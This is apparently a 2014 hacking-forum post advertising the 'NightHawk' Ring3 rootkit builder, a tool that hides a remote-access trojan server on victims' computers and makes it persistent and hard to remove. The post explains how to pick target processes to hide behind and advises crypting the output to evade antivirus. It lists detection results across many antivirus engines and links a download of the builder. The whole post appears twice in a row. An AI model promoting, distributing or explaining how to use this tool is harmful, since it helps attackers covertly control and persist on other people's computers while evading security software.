CpLover
04-17-2014, 03:07 PM
NightHawk Rootkit (Ring3)
A Rootkit is a tool that will make your RAT server more invisible by the user of the infected computer, the used process will be completely hidden so it will be impossible to find and of course so hard to delete
That rootkit was firstable totally private then the coder decide to released it for everyone , so now it is detected and crypting hte output file will be needed
-Works XP-7 x86 and x64, win8 untested.( please post feedbacks if you do the test )
Screenshots :
[imghttp://i.imgur.com/KBgwuVv.png[/img]
AS the picture shows , you will need to type the target you choose (separate them by a coma if you choose multiples targets , svchost.exe , winupdate.exe , vbc.exe etc ....for exemple)
The rootkit generated will be a copy of your original server but perfectly hidden , insanely persistent and impossible to kill !
Antivirus scan of the rootkit builder :
File Name: NightHawk - Builder.exe
File Size: 708.5 KB
Scan Date: 2014-04-04
Scan Result: 24/34
MD5: c0014c74826648ea7d198d77a544a450
Verified By NoDistribute: Virus Scan Result
AVG Free:Trojan horse Agent3.ARDO.dropper
ArcaVir: Clean
Avast:Win32:Malware-gen
AntiVir (Avira):TR/Gendal.6719402
BitDefender:Gen:Trojan.Heur.RP.SuW@aedx04ci
VirusBuster Internet Security:Trojan.Agent2!9Qry2+vkt7k
Clam Antivirus:Win.Trojan.Agent-456289
COMODO Internet Security:Malware@3g647mhcg44xg
Dr.Web:Trojan.Inject.55000
eTrust-Vet:Win32/Agent2.ZAAI!suspicious
F-PROT Antivirus:W32/Slenfbot.B.gen!Eldorado (generic, not disinfectable)
F-Secure Internet Security:Gen:Trojan.Heur.RP.SuW@aedx04ci
G Data:Gen:Trojan.Heur.RP.SuW@aedx04ci, Win32:Malware-gen
IKARUS Security:Trojan.Win32.Agent
Kaspersky Antivirus:Trojan.Win32.Agent2.eofc
McAfee:Artemis!C0014C748266
MS Security Essentials: Clean
Norman:winpe:win32:winpe:winpe/Obfuscated.KA
Norton Antivirus:Backdoor.Linopid
Panda Security: Clean
A-Squared: Clean
Quick Heal Antivirus: Clean
Solo Antivirus: Clean
Sophos:Mal/Generic-L
Trend Micro Internet Security: Clean
VBA32 Antivirus:<EMB-PE>�0000001 : infected Trojan.Agent2
Zoner AntiVirus: Clean
Ad-Aware:Trojan.Win32.Generic!BT
BullGuard:Gen:Trojan.Heur.RP.SuW@aedx04ci
Immunet Antivirus: Clean
K7 Ultimate:Trojan ( 004535c11 )
NANO Antivirus:Trojan.Win32.Agent2.bwovbb
Panda CommandLine: Clean
VIPRE:Trojan.Win32.Generic=21BT
Download Link :
Download NightHawk-Builder.rar from Sendspace.com - send big files the easy way (http://www.sendspace.com/file/i0gj33)
Feel free to contact me for any help or question about this rootkit and how to use it :)
regards
A Rootkit is a tool that will make your RAT server more invisible by the user of the infected computer, the used process will be completely hidden so it will be impossible to find and of course so hard to delete
That rootkit was firstable totally private then the coder decide to released it for everyone , so now it is detected and crypting hte output file will be needed
-Works XP-7 x86 and x64, win8 untested.( please post feedbacks if you do the test )
Screenshots :
[imghttp://i.imgur.com/KBgwuVv.png[/img]
AS the picture shows , you will need to type the target you choose (separate them by a coma if you choose multiples targets , svchost.exe , winupdate.exe , vbc.exe etc ....for exemple)
The rootkit generated will be a copy of your original server but perfectly hidden , insanely persistent and impossible to kill !
Antivirus scan of the rootkit builder :
File Name: NightHawk - Builder.exe
File Size: 708.5 KB
Scan Date: 2014-04-04
Scan Result: 24/34
MD5: c0014c74826648ea7d198d77a544a450
Verified By NoDistribute: Virus Scan Result
AVG Free:Trojan horse Agent3.ARDO.dropper
ArcaVir: Clean
Avast:Win32:Malware-gen
AntiVir (Avira):TR/Gendal.6719402
BitDefender:Gen:Trojan.Heur.RP.SuW@aedx04ci
VirusBuster Internet Security:Trojan.Agent2!9Qry2+vkt7k
Clam Antivirus:Win.Trojan.Agent-456289
COMODO Internet Security:Malware@3g647mhcg44xg
Dr.Web:Trojan.Inject.55000
eTrust-Vet:Win32/Agent2.ZAAI!suspicious
F-PROT Antivirus:W32/Slenfbot.B.gen!Eldorado (generic, not disinfectable)
F-Secure Internet Security:Gen:Trojan.Heur.RP.SuW@aedx04ci
G Data:Gen:Trojan.Heur.RP.SuW@aedx04ci, Win32:Malware-gen
IKARUS Security:Trojan.Win32.Agent
Kaspersky Antivirus:Trojan.Win32.Agent2.eofc
McAfee:Artemis!C0014C748266
MS Security Essentials: Clean
Norman:winpe:win32:winpe:winpe/Obfuscated.KA
Norton Antivirus:Backdoor.Linopid
Panda Security: Clean
A-Squared: Clean
Quick Heal Antivirus: Clean
Solo Antivirus: Clean
Sophos:Mal/Generic-L
Trend Micro Internet Security: Clean
VBA32 Antivirus:<EMB-PE>�0000001 : infected Trojan.Agent2
Zoner AntiVirus: Clean
Ad-Aware:Trojan.Win32.Generic!BT
BullGuard:Gen:Trojan.Heur.RP.SuW@aedx04ci
Immunet Antivirus: Clean
K7 Ultimate:Trojan ( 004535c11 )
NANO Antivirus:Trojan.Win32.Agent2.bwovbb
Panda CommandLine: Clean
VIPRE:Trojan.Win32.Generic=21BT
Download Link :
Download NightHawk-Builder.rar from Sendspace.com - send big files the easy way (http://www.sendspace.com/file/i0gj33)
Feel free to contact me for any help or question about this rootkit and how to use it :)
regards